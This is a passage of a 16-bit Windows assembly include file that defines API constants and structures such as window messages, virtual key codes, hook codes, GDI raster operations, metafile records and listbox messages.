ASPECTX =40 ; Length of the X leg
ASPECTY =42 ; Length of the Y leg
ASPECTXY =44 ; Length of the hypotenuse
endif ;NOGDICAPMASKS
IDI_APPLICATION = 32512
IDI_HAND = 32513
IDI_QUESTION = 32514
IDI_EXCLAMATION = 32515
IDI_ASTERISK = 32516
;
; OEM Resource Ordinal Numbers
;
OBM_CLOSE = 32754
OBM_UPARROW = 32753
OBM_DNARROW = 32752
OBM_RGARROW = 32751
OBM_LFARROW = 32750
OBM_REDUCE = 32749
OBM_ZOOM = 32748
OBM_RESTORE = 32747
OBM_REDUCED = 32746
OBM_ZOOMD = 32745
OBM_RESTORED = 32744
OBM_UPARROWD = 32743
OBM_DNARROWD = 32742
OBM_RGARROWD = 32741
OBM_LFARROWD = 32740
OBM_MNARROW = 32739
OBM_COMBO = 32738
OBM_UPARROWI = 32737
OBM_DNARROWI = 32736
OBM_RGARROWI = 32735
OBM_LFARROWI = 32734
OBM_OLD_CLOSE = 32767
OBM_SIZE = 32766
OBM_OLD_UPARROW = 32765
OBM_OLD_DNARROW = 32764
OBM_OLD_RGARROW = 32763
OBM_OLD_LFARROW = 32762
OBM_BTSIZE = 32761
OBM_CHECK = 32760
OBM_CHECKBOXES = 32759
OBM_BTNCORNERS = 32758
OBM_OLD_REDUCE = 32757
OBM_OLD_ZOOM = 32756
OBM_OLD_RESTORE = 32755
OCR_NORMAL = 32512
OCR_IBEAM = 32513
OCR_WAIT = 32514
OCR_CROSS = 32515
OCR_UP = 32516
OCR_SIZE = 32640
OCR_ICON = 32641
OCR_SIZENWSE = 32642
OCR_SIZENESW = 32643
OCR_SIZEWE = 32644
OCR_SIZENS = 32645
OCR_SIZEALL = 32646
OCR_ICOCUR = 32647
OIC_SAMPLE = 32512
OIC_HAND = 32513
OIC_QUES = 32514
OIC_BANG = 32515
OIC_NOTE = 32516
;
; Scroll bar constants
;
SB_HORZ = 0
SB_VERT = 1
SB_CTL = 2
SB_BOTH = 3
;
; Scroll Commands
;
SB_LINEUP = 0
SB_LINEDOWN = 1
SB_PAGEUP = 2
SB_PAGEDOWN = 3
SB_THUMBPOSITION = 4
SB_THUMBTRACK = 5
SB_TOP = 6
SB_BOTTOM = 7
SB_ENDSCROLL = 8
;
; MessageBox type flags
;
IFNDEF NOMB
MB_OK = 0000H
MB_OKCANCEL = 0001H
MB_ABORTRETRYIGNORE = 0002H
MB_YESNOCANCEL = 0003H
MB_YESNO = 0004H
MB_RETRYCANCEL = 0005H
MB_ICONHAND = 0010H
MB_ICONQUESTION = 0020H
MB_ICONEXCLAMATION = 0030H
MB_ICONASTERISK = 0040H
MB_DEFBUTTON1 = 0000H
MB_DEFBUTTON2 = 0100H
MB_DEFBUTTON3 = 0200H
MB_APPLMODAL = 0000H
MB_SYSTEMMODAL = 1000H
MB_TASKMODAL = 2000H
MB_NOFOCUS = 8000H
;
; Conventional dialog box and message box command IDs
;
IDOK = 1
IDCANCEL = 2
IDABORT = 3
IDRETRY = 4
IDIGNORE = 5
IDYES = 6
IDNO = 7
;
; Flags for OpenFile
;
OF_READ = 0000H
OF_WRITE = 0001H
OF_READWRITE = 0002H
OF_SHARE_COMPAT = 0000H
OF_SHARE_EXCLUSIVE = 0010H
OF_SHARE_DENY_WRITE = 0020H
OF_SHARE_DENY_READ = 0030H
OF_SHARE_DENY_NONE = 0040H
OF_PARSE = 0100H
OF_DELETE = 0200H
OF_VERIFY = 0400H ; Used with OF_REOPEN
OF_SEARCH = 0400H ; Used without OF_REOPEN
OF_CANCEL = 0800H
OF_CREATE = 1000H
OF_PROMPT = 2000H
OF_EXIST = 4000H
OF_REOPEN = 8000H
TF_FORCEDRIVE = 80H
OPENSTRUC STRUC
opLen db ?
opDisk db ?
opXtra dw ?
opDate dw ?
opTime dw ?
opFile db 120 dup (?)
OPENSTRUC ENDS
;
; DrawText format flags
;
DT_LEFT = 00H
DT_CENTER = 01H
DT_RIGHT = 02H
DT_TOP = 00H
DT_VCENTER = 04H
DT_BOTTOM = 08H
DT_WORDBREAK = 10H
DT_SINGLELINE = 20H
DT_EXPANDTABS = 40H
DT_TABSTOP = 80H
DT_NOCLIP = 0100H
DT_EXTERNALLEADING = 0200H
DT_CALCRECT = 0400H
DT_NOPREFIX = 0800H
DT_INTERNAL = 1000H
ENDIF
;
; ExtFloodFill style flags
;
FLOODFILLBORDER = 0
FLOODFILLSURFACE = 1
;
; Memory manager flags
;
LMEM_FIXED = 0000h
LMEM_MOVEABLE = 0002h
LMEM_NOCOMPACT = 0010H
LMEM_NODISCARD = 0020H
LMEM_ZEROINIT = 0040h
LMEM_MODIFY = 0080H
LMEM_DISCARDABLE= 0F00h
LHND = LMEM_MOVEABLE+LMEM_ZEROINIT
LPTR = LMEM_FIXED+LMEM_ZEROINIT
; Flags returned by LocalFlags (in addition to LMEM_DISCARDABLE)
LMEM_DISCARDED = 4000H
LMEM_LOCKCOUNT = 00FFH
NONZEROLHND = LMEM_MOVEABLE
NONZEROLPTR = LMEM_FIXED
GMEM_FIXED = 0000h
GMEM_MOVEABLE = 0002h
GMEM_NOCOMPACT = 0010h
GMEM_NODISCARD = 0020h
GMEM_ZEROINIT = 0040h
GMEM_MODIFY = 0080h
GMEM_DISCARDABLE= 0100h
GMEM_NOT_BANKED = 1000h
GMEM_DDESHARE = 2000h
GMEM_SHARE = 2000h
GMEM_NOTIFY = 4000h
GMEM_LOWER = GMEM_NOT_BANKED
GHND = GMEM_MOVEABLE+GMEM_ZEROINIT
GPTR = GMEM_FIXED+GMEM_ZEROINIT
WF_PMODE = 0001h
WF_CPU286 = 0002h
WF_CPU386 = 0004h
WF_CPU486 = 0008h
WF_STANDARD = 0010h
WF_WIN286 = 0010h
WF_ENHANCED = 0020h
WF_WIN386 = 0020h
WF_CPU086 = 0040h
WF_CPU186 = 0080h
WF_LARGEFRAME = 0100h
WF_SMALLFRAME = 0200h
WF_80x87 = 0400h
WF_PAGING = 0800h
WF_WLO = 8000h
IFNDEF NOVK
VK_LBUTTON = 01H
VK_RBUTTON = 02H
VK_CANCEL = 03H
VK_BACK = 08H
VK_TAB = 09H
VK_CLEAR = 0cH
VK_RETURN = 0dH
VK_SHIFT = 10H
VK_CONTROL = 11H
VK_MENU = 12H
VK_PAUSE = 13H
VK_CAPITAL = 14H
VK_ESCAPE = 1bH
VK_SPACE = 20H
VK_PRIOR = 21H
VK_NEXT = 22H
VK_END = 23H
VK_HOME = 24H
VK_LEFT = 25H
VK_UP = 26H
VK_RIGHT = 27H
VK_DOWN = 28H
; VK_A thru VK_Z are the same as their ASCII equivalents: 'A' thru 'Z'
; VK_0 thru VK_9 are the same as their ASCII equivalents: '0' thru '9'
VK_PRINT = 2aH
VK_EXECUTE = 2bH
VK_SNAPSHOT = 2ch ; Printscreen key..
VK_INSERT = 2dH
VK_DELETE = 2eH
VK_HELP = 2fH
VK_NUMPAD0 = 60H
VK_NUMPAD1 = 61H
VK_NUMPAD2 = 62H
VK_NUMPAD3 = 63H
VK_NUMPAD4 = 64H
VK_NUMPAD5 = 65H
VK_NUMPAD6 = 66H
VK_NUMPAD7 = 67H
VK_NUMPAD8 = 68H
VK_NUMPAD9 = 69H
VK_MULTIPLY = 6AH
VK_ADD = 6BH
VK_SEPARATER = 6CH
VK_SUBTRACT = 6DH
VK_DECIMAL = 6EH
VK_DIVIDE = 6FH
VK_F1 = 70H
VK_F2 = 71H
VK_F3 = 72H
VK_F4 = 73H
VK_F5 = 74H
VK_F6 = 75H
VK_F7 = 76H
VK_F8 = 77H
VK_F9 = 78H
VK_F10 = 79H
VK_F11 = 7aH
VK_F12 = 7bH
VK_F13 = 7cH
VK_F14 = 7dH
VK_F15 = 7eH
VK_F16 = 7fH
VK_F17 = 80H
VK_F18 = 81H
VK_F19 = 82H
VK_F20 = 83H
VK_F21 = 84H
VK_F22 = 85H
VK_F23 = 86H
VK_F24 = 87H
VK_NUMLOCK = 90H
VK_SCROLL = 91H
ENDIF
IFNDEF NOWH
; SetWindowsHook() codes
WH_MSGFILTER = (-1)
WH_JOURNALRECORD = 0
WH_JOURNALPLAYBACK = 1
WH_KEYBOARD = 2
WH_GETMESSAGE = 3
WH_CALLWNDPROC = 4
IFNDEF NOWIN31
WH_CBT = 5
WH_SYSMSGFILTER = 6
WH_MOUSE = 7
WH_HARDWARE = 8
WH_DEBUG = 9
ENDIF
;
; Hook Codes
HC_GETLPLPFN = (-3)
HC_LPLPFNNEXT = (-2)
HC_LPFNNEXT = (-1)
HC_ACTION = 0
HC_GETNEXT = 1
HC_SKIP = 2
HC_NOREM = 3
HC_NOREMOVE = 3
HC_SYSMODALON = 4
HC_SYSMODALOFF = 5
;
; CBT Hook Codes
HCBT_MOVESIZE = 0
HCBT_MINMAX = 1
HCBT_QS = 2
HCBT_CREATEWND = 3
HCBT_DESTROYWND = 4
HCBT_ACTIVATE = 5
HCBT_CLICKSKIPPED = 6
HCBT_KEYSKIPPED = 7
HCBT_SYSCOMMAND = 8
HCBT_SETFOCUS = 9
;
; WH_MSGFILTER Filter Proc Codes
MSGF_DIALOGBOX = 0
MSGF_MENU = 2
MSGF_MOVE = 3
MSGF_SIZE = 4
MSGF_SCROLLBAR = 5
MSGF_NEXTWINDOW = 6
;
; Window Manager Hook Codes
WC_INIT = 1
WC_SWP = 2
WC_DEFWINDOWPROC = 3
WC_MINMAX = 4
WC_MOVE = 5
WC_SIZE = 6
WC_DRAWCAPTION = 7
;
ENDIF ;NOWH
; GetWindow() Constants
GW_HWNDFIRST = 0
GW_HWNDLAST = 1
GW_HWNDNEXT = 2
GW_HWNDPREV = 3
GW_OWNER = 4
GW_CHILD = 5
;*************************************************************************
;
; Misc structures & constants
;
;*************************************************************************
IFNDEF NOMST
POINT struc
ptX dw ?
ptY dw ?
POINT ends
LOGPEN struc
lopnStyle dw ?
lopnWidth db (SIZE POINT) DUP(?)
lopnColor dd ?
LOGPEN ends
BITMAP STRUC
bmType DW ?
bmWidth DW ?
bmHeight DW ?
bmWidthBytes DW ?
bmPlanes DB ?
bmBitsPixel DB ?
bmBits DD ?
BITMAP ENDS
RGBTRIPLE struc
rgbBlue db ?
rgbGreen db ?
rgbRed db ?
RGBTRIPLE ends
RGBQUAD struc
rgbqBlue db ?
rgbqGreen db ?
rgbqRed db ?
rgbqReserved db ?
RGBQUAD ends
; Bitmap headers (Win16 layout); BITMAPCOREHEADER is needed by SIZE BITMAPCOREHEADER below
BITMAPCOREHEADER struc
bcSize dd ?
bcWidth dw ?
bcHeight dw ?
bcPlanes dw ?
bcBitCount dw ?
BITMAPCOREHEADER ends
BITMAPINFOHEADER struc
biSize dd ?
biWidth dd ?
biHeight dd ?
biPlanes dw ?
biBitCount dw ?
biCompression dd ?
biSizeImage dd ?
biXPelsPerMeter dd ?
biYPelsPerMeter dd ?
biClrUsed dd ?
biClrImportant dd ?
BITMAPINFOHEADER ends
BITMAPINFO struc
bmiHeader db (SIZE BITMAPINFOHEADER) DUP (?)
bmiColors db ? ; array of RGBQUADs
BITMAPINFO ends
BITMAPCOREINFO struc
bmciHeader db (SIZE BITMAPCOREHEADER) DUP (?)
bmciColors db ? ; array of RGBTRIPLEs
BITMAPCOREINFO ends
BITMAPFILEHEADER struc
bfType dw ?
bfSize dd ?
bfReserved1 dw ?
bfReserved2 dw ?
bfOffBits dd ?
BITMAPFILEHEADER ends
WNDSTRUC struc
WSwndStyle dd ?
WSwndID dw ?
WSwndText dw ?
WSwndParent dw ?
WSwndInstance dw ?
WSwndClassProc dd ?
WNDSTRUC ends
;
; Message structure
;
MSGSTRUCT struc
msHWND dw ?
msMESSAGE dw ?
msWPARAM dw ?
msLPARAM dd ?
msTIME dd ?
msPT dd ?
MSGSTRUCT ends
NEWPARMS struc
nprmHwnd dw ?
nprmCmd db ?
NEWPARMS ends
ENDIF
PAINTSTRUCT STRUC
PShdc DW ?
PSfErase DW ?
PSrcPaint DB size RECT dup(?)
PSfRestore DW ?
PSfIncUpdate DW ?
PSrgbReserved DB 16 dup(?)
PAINTSTRUCT ENDS
CREATESTRUCT struc
cs_lpCreateParams dd ?
cs_hInstance dw ?
cs_hMenu dw ?
cs_hwndParent dw ?
cs_cy dw ?
cs_cx dw ?
cs_y dw ?
cs_x dw ?
cs_style dd ?
cs_lpszName dd ?
cs_lpszClass dd ?
cs_dwExStyle dd ?
CREATESTRUCT ends
;
; PostError constants
;
WARNING = 0 ; command codes
MINOR_ERROR = 1
FATAL_ERROR = 2
IFNDEF NORASTOPS
;
; Binary raster ops
;
R2_BLACK = 1
R2_NOTMERGEPEN = 2
R2_MASKNOTPEN = 3
R2_NOTCOPYPEN = 4
R2_MASKPENNOT = 5
R2_NOT = 6
R2_XORPEN = 7
R2_NOTMASKPEN = 8
R2_MASKPEN = 9
R2_NOTXORPEN = 10
R2_NOP = 11
R2_MERGENOTPEN = 12
R2_COPYPEN = 13
R2_MERGEPENNOT = 14
R2_MERGEPEN = 15
R2_WHITE = 16
;
; Ternary raster ops
;
SRCCOPY_L = 0020h ;dest=source
SRCCOPY_H = 00CCh
SRCPAINT_L = 0086h ;dest=source OR dest
SRCPAINT_H = 00EEh
SRCAND_L = 00C6h ;dest=source AND dest
SRCAND_H = 0088h
SRCINVERT_L = 0046h ;dest= source XOR dest
SRCINVERT_H = 0066h
SRCERASE_L = 0328h ;dest= source AND (not dest )
SRCERASE_H = 0044h
NOTSRCCOPY_L = 0008h ;dest= (not source)
NOTSRCCOPY_H = 0033h
NOTSRCERASE_L = 00A6h ;dest= (not source) AND (not dest)
NOTSRCERASE_H = 0011h
MERGECOPY_L = 00CAh ;dest= (source AND pattern)
MERGECOPY_H = 00C0h
MERGEPAINT_L = 0226h ;dest= (source AND pattern) OR dest
MERGEPAINT_H = 00BBh
PATCOPY_L = 0021h ;dest= pattern
PATCOPY_H = 00F0h
PATPAINT_L = 0A09h ;DPSnoo
PATPAINT_H = 00FBh
PATINVERT_L = 0049h ;dest= pattern XOR dest
PATINVERT_H = 005Ah
DSTINVERT_L = 0009h ;dest= (not dest)
DSTINVERT_H = 0055h
BLACKNESS_L = 0042h ;dest= BLACK
BLACKNESS_H = 0000h
WHITENESS_L = 0062h ;dest= WHITE
WHITENESS_H = 00FFh
;
; StretchBlt modes
;
BLACKONWHITE = 1
WHITEONBLACK = 2
COLORONCOLOR = 3
;
; New StretchBlt modes
;
STRETCH_ANDSCANS = 1
STRETCH_ORSCANS = 2
STRETCH_DELETESCANS = 3
;
; PolyFill modes
;
ALTERNATE = 1
WINDING = 2
ENDIF
;
; Text Alignment Options
;
TA_NOUPDATECP = 0
TA_UPDATECP = 1
TA_LEFT = 0
TA_RIGHT = 2
TA_CENTER = 6
TA_TOP = 0
TA_BOTTOM = 8
TA_BASELINE = 24
ETO_GRAYED = 1
ETO_OPAQUE = 2
ETO_CLIPPED = 4
ASPECT_FILTERING = 1
ifndef NOMETAFILE
; Metafile Functions
META_SETBKCOLOR = 0201h
META_SETBKMODE = 0102h
META_SETMAPMODE = 0103h
META_SETROP2 = 0104h
META_SETRELABS = 0105h
META_SETPOLYFILLMODE = 0106h
META_SETSTRETCHBLTMODE = 0107h
META_SETTEXTCHAREXTRA = 0108h
META_SETTEXTCOLOR = 0209h
META_SETTEXTJUSTIFICATION = 020Ah
META_SETWINDOWORG = 020Bh
META_SETWINDOWEXT = 020Ch
META_SETVIEWPORTORG = 020Dh
META_SETVIEWPORTEXT = 020Eh
META_OFFSETWINDOWORG = 020Fh
META_SCALEWINDOWEXT = 0400h
META_OFFSETVIEWPORTORG = 0211h
META_SCALEVIEWPORTEXT = 0412h
META_LINETO = 0213h
META_MOVETO = 0214h
META_EXCLUDECLIPRECT = 0415h
META_INTERSECTCLIPRECT = 0416h
META_ARC = 0817h
META_ELLIPSE = 0418h
META_FLOODFILL = 0419h
META_PIE = 081Ah
META_RECTANGLE = 041Bh
META_ROUNDRECT = 061Ch
META_PATBLT = 061Dh
META_SAVEDC = 001Eh
META_SETPIXEL = 041Fh
META_OFFSETCLIPRGN = 0220h
META_TEXTOUT = 0521h
META_BITBLT = 0922h
META_STRETCHBLT = 0B23h
META_POLYGON = 0324h
META_POLYLINE = 0325h
META_ESCAPE = 0626h
META_RESTOREDC = 0127h
META_FILLREGION = 0228h
META_FRAMEREGION = 0429h
META_INVERTREGION = 012Ah
META_PAINTREGION = 012Bh
META_SELECTCLIPREGION = 012Ch
META_SELECTOBJECT = 012Dh
META_SETTEXTALIGN = 012Eh
META_DRAWTEXT = 062Fh
META_CHORD = 0830h
META_SETMAPPERFLAGS = 0231h
META_EXTTEXTOUT = 0a32h
META_SETDIBTODEV = 0d33h
META_SELECTPALETTE = 0234h
META_REALIZEPALETTE = 0035h
META_ANIMATEPALETTE = 0436h
META_SETPALENTRIES = 0037h
META_POLYPOLYGON = 0538h
META_RESIZEPALETTE = 0139h
META_DIBBITBLT = 0940h
META_DIBSTRETCHBLT = 0b41h
META_DIBCREATEPATTERNBRUSH = 0142h
META_STRETCHDIB = 0f43h
META_DELETEOBJECT = 01f0h
META_CREATEPALETTE = 00f7h
META_CREATEBRUSH = 00F8h
META_CREATEPATTERNBRUSH = 01F9h
META_CREATEPENINDIRECT = 02FAh
META_CREATEFONTINDIRECT = 02FBh
META_CREATEBRUSHINDIRECT = 02FCh
META_CREATEBITMAPINDIRECT = 02FDh
META_CREATEBITMAP = 06FEh
META_CREATEREGION = 06FFh
METARECORD struc
mr_rdSize dd ?
mr_rdFunction dw ?
mr_rdParm dw ?
METARECORD ends
METAFILEPICT struc
mfp_mm dw ?
mfp_xExt dw ?
mfp_yExt dw ?
mfp_hMF dw ?
METAFILEPICT ends
METAHEADER struc
mtType dw ?
mtHeaderSize dw ?
mtVersion dw ?
mtSize dd ?
mtNoObjects dw ?
mtMaxRecord dd ?
mtNoParameters dw ?
METAHEADER ends
endif ; NOMETAFILE
; GDI Escapes
NEWFRAME = 1
ABORTDOC = 2
NEXTBAND = 3
SETCOLORTABLE = 4
GETCOLORTABLE = 5
FLUSHOUTPUT = 6
DRAFTMODE = 7
QUERYESCSUPPORT = 8
SETABORTPROC = 9
STARTDOC = 10
;; This value conflicts with a std WIN386 MACRO definition
;;ENDDOC = 11
GETPHYSPAGESIZE = 12
GETPRINTINGOFFSET = 13
GETSCALINGFACTOR = 14
MFCOMMENT = 15
GETPENWIDTH = 16
SETCOPYCOUNT = 17
SELECTPAPERSOURCE = 18
DEVICEDATA = 19
PASSTHROUGH = 19
GETTECHNOLGY = 20
GETTECHNOLOGY = 20
SETENDCAP = 21
SETLINEJOIN = 22
SETMITERLIMIT = 23
BANDINFO = 24
DRAWPATTERNRECT = 25
GETVECTORPENSIZE = 26
GETVECTORBRUSHSIZE = 27
ENABLEDUPLEX = 28
ENABLEMANUALFEED = 29
GETSETPAPERBINS = 29
GETSETPRINTORIENT = 30
ENUMPAPERBINS = 31
GETEXTENDEDTEXTMETRICS = 256
GETEXTENTTABLE = 257
GETPAIRKERNTABLE = 258
GETTRACKKERNTABLE = 259
EXTTEXTOUT = 512
ENABLERELATIVEWIDTHS = 768
ENABLEPAIRKERNING = 769
SETKERNTRACK = 770
SETALLJUSTVALUES = 771
SETCHARSET = 772
GETSETSCREENPARAMS = 3072
STRETCHBLT = 2048
PR_JOBSTATUS = 0000
;
; Menu flags for Change/Check/Enable MenuItem
;
MF_INSERT = 0000h
MF_CHANGE = 0080h
MF_APPEND = 0100h
MF_DELETE = 0200h
MF_REMOVE = 1000h
MF_BYCOMMAND = 0000h
MF_BYPOSITION = 0400h
MF_SEPARATOR = 0800h
MF_ENABLED = 0000h
MF_GRAYED = 0001h
MF_DISABLED = 0002h
MF_UNCHECKED = 0000h
MF_CHECKED = 0008h
MF_USECHECKBITMAPS= 0200h
MF_STRING = 0000h
MF_BITMAP = 0004h
MF_OWNERDRAW = 0100h
MF_POPUP = 0010h
MF_MENUBARBREAK = 0020h
MF_MENUBREAK = 0040h
MF_UNHILITE = 0000h
MF_HILITE = 0080h
MF_SYSMENU = 2000h
MF_HELP = 4000h
MF_MOUSESELECT = 8000h
;
; System Menu Command Values
;
SC_SIZE = 0F000h
SC_MOVE = 0F010h
SC_MINIMIZE = 0F020h
SC_MAXIMIZE = 0F030h
SC_NEXTWINDOW = 0F040h
SC_PREVWINDOW = 0F050h
SC_CLOSE = 0F060h
SC_VSCROLL = 0F070h
SC_HSCROLL = 0F080h
SC_MOUSEMENU = 0F090h
SC_KEYMENU = 0F100h
SC_ARRANGE = 0F110h
SC_RESTORE = 0F120h
SC_TASKLIST = 0F130h
SC_SCREENSAVE = 0F140h
SC_HOTKEY = 0F150h
SC_ICON = SC_MINIMIZE
SC_ZOOM = SC_MAXIMIZE
;
; Window State Messages
;
IFNDEF NOWM
WM_STATE = 0000H
WM_NULL = 0000h
WM_CREATE = 0001h
WM_DESTROY = 0002h
WM_MOVE = 0003h
WM_SIZE = 0005h
WM_ACTIVATE = 0006h
WM_SETFOCUS = 0007h
WM_KILLFOCUS = 0008h
WM_ENABLE = 000Ah
WM_SETREDRAW = 000Bh
WM_SETTEXT = 000Ch
WM_GETTEXT = 000Dh
WM_GETTEXTLENGTH = 000Eh
WM_PAINT = 000Fh
WM_CLOSE = 0010h
WM_QUERYENDSESSION = 0011h
WM_QUIT = 0012h
WM_QUERYOPEN = 0013h
WM_ERASEBKGND = 0014h
WM_SYSCOLORCHANGE = 0015h
WM_ENDSESSION = 0016h
WM_SYSTEMERROR = 0017h
WM_SHOWWINDOW = 0018h
WM_CTLCOLOR = 0019h
WM_WININICHANGE = 001Ah
WM_DEVMODECHANGE = 001Bh
WM_ACTIVATEAPP = 001Ch
WM_FONTCHANGE = 001Dh
WM_TIMECHANGE = 001Eh
WM_CANCELMODE = 001Fh
WM_SETCURSOR = 0020h
WM_MOUSEACTIVATE = 0021h
WM_CHILDACTIVATE = 0022h
WM_QUEUESYNC = 0023h
WM_GETMINMAXINFO = 0024h
WM_PAINTICON = 0026h
WM_ICONERASEBKGND = 0027h
WM_NEXTDLGCTL = 0028h
WM_SPOOLERSTATUS = 002Ah
WM_DRAWITEM = 002Bh
WM_MEASUREITEM = 002Ch
WM_DELETEITEM = 002Dh
WM_VKEYTOITEM = 002Eh
WM_CHARTOITEM = 002Fh
WM_SETFONT = 0030h
WM_GETFONT = 0031h
WM_QUERYDRAGICON = 0037h
WM_COMPAREITEM = 0039h
WM_COMPACTING = 0041h
IFNDEF NOWIN31
WM_COMMNOTIFY = 0044h
WM_WINDOWPOSCHANGING= 0046h
WM_WINDOWPOSCHANGED = 0047h
WM_POWER = 0048h
ENDIF
WM_NCCREATE = 0081h
WM_NCDESTROY = 0082h
WM_NCCALCSIZE = 0083h
WM_NCHITTEST = 0084h
WM_NCPAINT = 0085h
WM_NCACTIVATE = 0086h
WM_GETDLGCODE = 0087h
WM_NCMOUSEMOVE = 00A0h
WM_NCLBUTTONDOWN = 00A1h
WM_NCLBUTTONUP = 00A2h
WM_NCLBUTTONDBLCLK = 00A3h
WM_NCRBUTTONDOWN = 00A4h
WM_NCRBUTTONUP = 00A5h
WM_NCRBUTTONDBLCLK = 00A6h
WM_NCMBUTTONDOWN = 00A7h
WM_NCMBUTTONUP = 00A8h
WM_NCMBUTTONDBLCLK = 00A9h
WM_KEYFIRST = 0100h
WM_KEYDOWN = 0100h
WM_KEYUP = 0101h
WM_CHAR = 0102h
WM_DEADCHAR = 0103h
WM_SYSKEYDOWN = 0104h
WM_SYSKEYUP = 0105h
WM_SYSCHAR = 0106h
WM_SYSDEADCHAR = 0107h
WM_KEYLAST = 0108h
WM_INITDIALOG = 0110h
WM_COMMAND = 0111h
WM_SYSCOMMAND = 0112h
WM_TIMER = 0113h
WM_HSCROLL = 0114h
WM_VSCROLL = 0115h
WM_INITMENU = 0116h
WM_INITMENUPOPUP = 0117h
WM_MENUSELECT = 011Fh
WM_MENUCHAR = 0120h
WM_ENTERIDLE = 0121h
WM_MOUSEFIRST = 0200h
WM_MOUSEMOVE = 0200h
WM_LBUTTONDOWN = 0201h
WM_LBUTTONUP = 0202h
WM_LBUTTONDBLCLK = 0203h
WM_RBUTTONDOWN = 0204h
WM_RBUTTONUP = 0205h
WM_RBUTTONDBLCLK = 0206h
WM_MBUTTONDOWN = 0207h
WM_MBUTTONUP = 0208h
WM_MBUTTONDBLCLK = 0209h
WM_MOUSELAST = 0209h
WM_PARENTNOTIFY = 0210h
WM_MDICREATE = 0220h
WM_MDIDESTROY = 0221h
WM_MDIACTIVATE = 0222h
WM_MDIRESTORE = 0223h
WM_MDINEXT = 0224h
WM_MDIMAXIMIZE = 0225h
WM_MDITILE = 0226h
WM_MDICASCADE = 0227h
WM_MDIICONARRANGE = 0228h
WM_MDIGETACTIVE = 0229h
WM_MDISETMENU = 0230h
WM_DROPFILES = 0233h
WM_CUT = 0300h
WM_COPY = 0301h
WM_PASTE = 0302h
WM_CLEAR = 0303h
WM_UNDO = 0304h
WM_RENDERFORMAT = 0305h
WM_RENDERALLFORMATS = 0306h
WM_DESTROYCLIPBOARD = 0307h
WM_DRAWCLIPBOARD = 0308h
WM_PAINTCLIPBOARD = 0309h
WM_VSCROLLCLIPBOARD = 030Ah
WM_SIZECLIPBOARD = 030Bh
WM_ASKCBFORMATNAME = 030Ch
WM_CHANGECBCHAIN = 030Dh
WM_HSCROLLCLIPBOARD = 030Eh
WM_QUERYNEWPALETTE = 030Fh
WM_PALETTEISCHANGING = 0310h
WM_PALETTECHANGED = 0311h
IFNDEF NOWIN31
WM_PENWINFIRST equ 0380h
WM_PENWINLAST equ 038Fh
ENDIF
; ShowWindow() Commands
SW_HIDE = 0
SW_SHOWNORMAL = 1
SW_NORMAL = 1
SW_SHOWMINIMIZED = 2
SW_SHOWMAXIMIZED = 3
SW_MAXIMIZE = 3
SW_SHOWNOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_SHOWMINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
;
; Special CreateWindow position value
;
CW_USEDEFAULT EQU 8000h
;
; Windows styles (the high words)
;
WS_OVERLAPPED = 00000h
WS_ICONICPOPUP = 0C000h
WS_POPUP = 08000h
WS_CHILD = 04000h
WS_MINIMIZE = 02000h
WS_VISIBLE = 01000h
WS_DISABLED = 00800h
WS_CLIPSIBLINGS = 00400h
WS_CLIPCHILDREN = 00200h
WS_MAXIMIZE = 00100h
WS_CAPTION = 000C0h ; WS_BORDER | WS_DLGFRAME
WS_BORDER = 00080h
WS_DLGFRAME = 00040h
WS_VSCROLL = 00020h
WS_HSCROLL = 00010h
WS_SYSMENU = 00008h
WS_THICKFRAME = 00004h
WS_HREDRAW = 00002h
WS_VREDRAW = 00001h
WS_GROUP = 00002h
WS_TABSTOP = 00001h
WS_MINIMIZEBOX = 00002h
WS_MAXIMIZEBOX = 00001h
WS_TILED = WS_OVERLAPPED
WS_ICONIC = WS_MINIMIZE
WS_SIZEBOX = WS_THICKFRAME
;
; predefined clipboard formats
;
CF_TEXT = 1
CF_BITMAP = 2
CF_METAFILEPICT = 3
CF_SYLK = 4
CF_DIF = 5
CF_TIFF = 6
CF_OEMTEXT = 7
CF_DIB = 8
CF_PALETTE = 9
CF_PENDATA = 10
CF_RIFF = 11
CF_WAVE = 12
MAKEINTRESOURCE MACRO a
mov ax,a
xor dx,dx
ENDM
;
; Predefined resource types
;
RT_CURSOR = 1 ; must be passed through MAKEINTRESOURCE
RT_BITMAP = 2
RT_ICON = 3
RT_MENU = 4
RT_DIALOG = 5
RT_STRING = 6
RT_FONTDIR = 7
RT_FONT = 8
RT_ACCELERATOR = 9
RT_RCDATA = 10
;** NOTE: if any new resource types are introduced above this point, then the
;** value of DIFFERENCE must be changed.
;** (RT_GROUP_CURSOR - RT_CURSOR) must always be equal to DIFFERENCE
;** (RT_GROUP_ICON - RT_ICON) must always be equal to DIFFERENCE
DIFFERENCE = 11
IFNDEF NOMDI
MDICREATESTRUCT struc
szClass dd ?
szTitle dd ?
hOwner dw ?
x dw ?
y dw ?
cxc dw ?
cyc dw ?
style dd ?
MDICREATESTRUCT ends
CLIENTCREATESTRUCT struc
hWindowMenu dw ?
idFirstChild dw ?
CLIENTCREATESTRUCT ends
ENDIF
; NOMDI
PALETTEENTRY struc
peRed db ?
peGreen db ?
peBlue db ?
peFlags db ?
PALETTEENTRY ends
; Logical Palette
LOGPALETTE struc
palVersion dw ?
palNumEntries dw ?
palPalEntry db ? ; array of PALETTEENTRY
LOGPALETTE ends
; PeekMessage() Options
PM_NOREMOVE = 0000h
PM_REMOVE = 0001h
PM_NOYIELD = 0002h
; SetWindowPos Flags
SWP_NOSIZE = 0001h
SWP_NOMOVE = 0002h
SWP_NOZORDER = 0004h
SWP_NOREDRAW = 0008h
SWP_NOACTIVATE = 0010h
SWP_DRAWFRAME = 0020h
SWP_SHOWWINDOW = 0040h
SWP_HIDEWINDOW = 0080h
SWP_NOCOPYBITS = 0100h
SWP_NOREPOSITION = 0200h
IFNDEF NOWINMESSAGES
; Listbox messages
LB_ADDSTRING = (WM_USER+1)
LB_INSERTSTRING = (WM_USER+2)
LB_DELETESTRING = (WM_USER+3)
LB_RESETCONTENT = (WM_USER+5)
LB_SETSEL = (WM_USER+6)
LB_SETCURSEL = (WM_USER+7)
LB_GETSEL = (WM_USER+8)
LB_GETCURSEL = (WM_USER+9)
LB_GETTEXT = (WM_USER+10)
LB_GETTEXTLEN = (WM_USER+11)
LB_GETCOUNT = (WM_USER+12)
LB_SELECTSTRING = (WM_USER+13)
LB_DIR = (WM_USER+14)
LB_GETTOPINDEX = (WM_USER+15)
LB_FINDSTRING = (WM_USER+16)
LB_GETSELCOUNT = (WM_USER+17)
LB_GETSELITEMS = (WM_USER+18)
LB_SETTABSTOPS = (WM_USER+19)
